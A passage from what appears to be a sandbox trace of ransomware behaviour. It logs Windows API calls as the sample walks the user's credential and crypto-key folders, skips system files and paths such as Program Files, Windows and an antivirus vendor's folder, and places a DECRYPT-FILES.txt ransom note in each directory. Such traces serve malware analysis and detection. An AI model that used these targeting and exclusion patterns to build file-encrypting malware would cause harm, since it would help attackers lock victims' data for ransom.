HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.462] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.462] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.462] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.462] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.462] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeb00e40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.462] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.462] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.462] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.462] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.462] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.462] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.462] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.462] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.462] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.462] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.462] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.462] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.462] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.462] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.462] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.462] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 68 [0180.462] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.462] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\" [0180.463] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\0a16c9.tmp" [0180.463] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.463] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.463] CloseHandle (hObject=0x0) returned 0 [0180.463] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.463] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa53cfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.463] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.463] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa53cfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.463] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.463] CloseHandle (hObject=0x26c) returned 1 [0180.463] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0180.463] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0180.463] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0180.464] lstrcatW (in: lpString1="Crypto", lpString2="\\" | out: lpString1="Crypto\\") returned="Crypto\\" [0180.464] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Crypto\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\" [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Program Files") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch=":\\Windows") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Games\\") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\All Users") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="AhnLab") returned 0x0 [0180.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.464] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 63 [0180.464] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.464] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\\\0a16c9.tmp") returned 74 [0180.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.464] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 63 [0180.464] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.464] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\\\DECRYPT-FILES.txt") returned 81 [0180.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.465] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 63 [0180.465] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0180.465] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.465] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.465] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.465] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.465] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.465] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeb00e40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.465] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.465] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.465] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.465] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.465] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.465] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.465] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.465] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.465] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.465] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.465] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.465] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.465] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.465] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.465] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.465] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 63 [0180.465] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.465] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\" [0180.465] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\0a16c9.tmp" [0180.466] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.466] CloseHandle (hObject=0x0) returned 0 [0180.466] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.466] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa53cfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.466] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.466] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0180.466] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0180.466] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0180.466] lstrcatW (in: lpString1="RSA", lpString2="\\" | out: lpString1="RSA\\") returned="RSA\\" [0180.466] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="RSA\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0180.466] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Program Files") returned 0x0 [0180.466] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch=":\\Windows") returned 0x0 [0180.466] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Games\\") returned 0x0 [0180.466] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.466] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.466] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.466] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\All Users") returned 0x0 [0180.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="AhnLab") returned 0x0 [0180.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.467] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 67 [0180.467] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.467] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\0a16c9.tmp") returned 78 [0180.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.467] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 67 [0180.467] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.467] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\DECRYPT-FILES.txt") returned 85 [0180.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.468] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 67 [0180.468] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0180.468] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.468] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.468] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.468] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.468] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.468] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeb00e40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.468] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.468] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.468] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.468] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.468] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.469] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.469] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.469] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.469] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.469] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.469] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.469] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.469] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.469] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.469] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.469] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 67 [0180.469] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.469] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") 